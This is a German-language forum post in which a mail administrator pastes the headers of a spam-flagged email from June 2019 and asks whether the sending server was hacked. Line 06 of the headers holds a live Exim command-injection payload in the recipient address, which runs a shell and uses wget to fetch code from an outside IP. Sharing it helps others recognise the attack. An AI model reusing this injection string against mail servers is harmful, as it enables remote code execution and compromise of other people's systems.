Hallo,
bei mir wurde dieselbe "Attacke" durchgeführt:
header:
01: Return-Path: <support [at] service.com>
02: Delivered-To: poor [at] spamvictim.tld
03: Received: from localhost (localhost [127.0.0.1])
04: by xx.com (Postfix) with ESMTP ID: [ID filtered]
05: for
06: <root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f2.59.132.181x22}}@xx.com>;
07: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
08: X-Quarantine-ID: [ID filtered]
09: X-Virus-Scanned: Debian amavisd-new at xx.com
10: X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date"
11: X-Spam-Flag: YES
12: X-Spam-Score: 12.981
13: X-Spam-Level: ************
14: X-Spam-Status: Yes, score=12.981 tagged_above=1 required=4.5
15: tests=[EMPTY_MESSAGE=2.344, MISSING_DATE=1.396, MISSING_FROM=1,
16: MISSING_HEADERS=1.207, MISSING_MID=0.14, MISSING_SUBJECT=1.767,
17: PYZOR_CHECK=1.985, RDNS_NONE=1.274, SPF_HELO_SOFTFAIL=0.896,
18: SPF_SOFTFAIL=0.972] autolearn=no autolearn_force=no
19: Subject: ***SPAM***
20: Received: from xx.com ([127.0.0.1])
21: by localhost (xx.com [127.0.0.1]) (amavisd-new, port 10024)
22: with ESMTP ID: [ID filtered]
23: Received: from service.com (unknown [68.183.4.19])
24: by xx.com (Postfix) with SMTP ID: [ID filtered]
25: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
26: Received: 1
27: Received: 2
28: Received: 3
29: Received: 4
30: Received: 5
31: Received: 6
32: Received: 7
33: Received: 8
34: Received: 9
35: Received: 10
36: Received: 11
37: Received: 12
38: Received: 13
39: Received: 14
40: Received: 15
41: Received: 16
42: Received: 17
43: Received: 18
44: Received: 19
45: Received: 20
46: Received: 21
47: Received: 22
48: Received: 23
49: Received: 24
50: Received: 25
51: Received: 26
52: Received: 27
53: Received: 28
54: Received: 29
55: Received: 30
56: Received: 31
57: Message-ID: [ID filtered]
58: Date: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
59: From: support [at] service.com
Haben ebenfalls kein Exim im Einsatz. 68.183.4.19 ist per web erreichbar, wurde vielleicht sein Mail Server gehackt?
Lesezeichen